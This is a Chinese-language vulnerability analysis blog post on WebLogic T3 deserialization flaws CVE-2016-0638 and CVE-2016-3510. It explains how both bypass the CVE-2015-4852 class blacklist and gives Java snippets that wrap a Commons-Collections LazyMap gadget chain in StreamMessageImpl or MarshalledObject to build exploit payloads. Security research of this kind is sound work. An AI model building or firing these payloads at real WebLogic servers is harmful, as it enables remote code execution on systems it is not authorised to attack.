当前位置:   article > 正文

WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510

cve-2016-0638

WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510

CVE-2016-0638 是前面分析的 CVE-2015-4852 的一个绕过,通过找到一个不在黑名单中的类,且这个类存在readObject/readResolve/readExternal 方法,并且恰好这些方法里面有一些数据进行反序列化操作,那么这时我们就可以把原生的序列化数据封装到这个类里面,通过调用反序列化对象重写的readObject/readResolve/readExternal 方法这一特点来反序列化封装在类里面的原生序列化数据。

修复环境搭建

因为这里的 CVE-2016-0638 是 CVE-2015-4852 的一个绕过,所以这里需要在前面那个 docker 环境中打上补丁,以此来分析 WebLogic 的补丁到底打到了那里。

环境搭建参考这篇文章:https://www.cnblogs.com/nice0e3/p/14207435.html

如果按照上面文章搭建报如下错误
image-20220128202843340
则需要把EJUM.jar/patch-catalog_22958.xml这两个文件从p20780171_1036_Generic目录拷贝到/u01/app/oracle/middleware/utils/bsu/cache_dir/目录下

补丁下载参考:https://www.cnblogs.com/hmhhz/p/11422019.html

CVE-2015-4852的防御

先来看下 WebLogic 对 CVE-2015-4852 反序列化漏洞的防御,在安装好补丁之后用前面的脚本打目标服务器,发现无法成功创建文件,把断点下在 ServerChannelInputStream#resolveClass 方法上,可以看到这里多了一个黑名单检查
image-20220128204003976
咋们跟进一下 ClassFilter#isBlackListed 方法,ClassFilter 这个类有静态代码块,那么先来看下静态代码块
image-20220128204124947
这里应该是判断有无设置一些参数为 true
image-20220128204655232
根据判断设置的参数情况来添加相应的类到黑名单里面,最终我这里的黑名单类为如下
image-20220128204934385
然后 isBlackListed 方法判断传入的类名是否存在于类黑名单中,如果存在则直接返回 true 了,如果不存在则截取包名,再判断包名是否存在类黑名单中,在这里的过滤的类黑名单中没有sun.reflect.annotation.AnnotationInvocationHandler 类在里面
image-20220128205420340
虽然 AnnotationInvocationHandler 类不在类黑名单里面,但是一些Gadget所用到的类在黑名单里面,而在AnnotationInvocationHandler 类直接通过 InboundMsgAbbrev#readObject 进行反序列化的过程中会再次调用到 ServerChannelInputStream#resolveClass 方法来处理比如 org.apache.commons.collections.map.LazyMap 类,而这个类会被黑名单检测到 ,这样一来自然就被拦截了
image-20220129011919745
除了这里有检测之外,MsgAbbrevInputStream#resolveClass 方法也存在检测,不过检测的手段都是一样的,就不再赘述。
image-20220128211420511

绕过思路

这篇的开头也说了其中的一种绕过思路了,就是找一个存在 readObject/readResolve/readExternal 方法的类,且这个类的这些方法里面又调用了 ObjectInputStream#readObject 方法来反序列化一些数据,我们只需要把真正的 payload 封装在类里面,这样就绕过了黑名单的检测。

CVE-2016-0638

这里的绕过用到的是 StreamMessageImpl 类,这个类存在 readExternal 方法,且这个方法调用了 ObjectInputStream#readObject方法来反序列化从输入流中读取出来的数据。
image-20220129004852855
要让 var3 为1, var4 为恶意序列化数据,这里通过重写 StreamMessageImpl#writeExternal 方法,在构造 payload 的项目创建 weblogic.jms.common 包,并增加两个属性和三个方法

private byte[] buffer;
private int length;

public final byte[] getDataBuffer() {
    return this.bdos != null ? this.bdos.getBuffer() : this.buffer;
}

public final int getDataSize() {
    return this.bdos != null ? this.bdos.size() : this.length;
}

public final void setDataBuffer(byte[] var1, int var2) {
    this.buffer = var1;
    this.length = var2;
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

重写 writeExternal 方法,手工写入值为1的 byte 数据和恶意的序列化数据,这样在调用到 StreamMessageImpl#readExternal 方法的时候就可以调用到 readObject 方法,并且 var4 为恶意的序列化数据。

public void writeExternal(ObjectOutput paramObjectOutput) throws IOException {
    super.writeExternal(paramObjectOutput);
    paramObjectOutput.writeByte(1);
    paramObjectOutput.writeInt(getDataSize());
    paramObjectOutput.write(getDataBuffer());
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

构造 payload

public static Object getObject() throws Exception{
    InvocationHandler invocationHandler = (InvocationHandler) Collections01LazyMap.getObject();
    byte[] bytes = SerWithUnSer.serialize(invocationHandler,false);
    StreamMessageImpl streamMessage = new StreamMessageImpl();
    streamMessage.setDataBuffer(bytes,bytes.length);
    return streamMessage;
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

对一些序列化的过程进行了封装,不过原理都是一样的。

CVE-2016-3510

CVE-2016-3510 用到的是 MarshalledObject#readResolve方法,看一下这个方法的逻辑。
image-20220128225312859
objBytes 属性是一个对象,对这个属性对象使用 readObject 方法,那么也就很明显了,把恶意对象封装到 MarshalledObject 类的 objBytes 属性中即可

public static Object getObject() throws Exception{
    InvocationHandler invocationHandler = (InvocationHandler) Collections01LazyMap.getObject();
    MarshalledObject marshalledObject = new MarshalledObject(invocationHandler);
    return marshalledObject;
}
  • 1
  • 2
  • 3
  • 4
  • 5

生成序列化文件之后用前面的 cve-2015-4852 打就行

参考文章

https://www.cnblogs.com/nice0e3/p/14207435.html
https://github.com/5up3rc/weblogic_cmd

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/450742
推荐阅读
相关标签
  

闽ICP备14008679号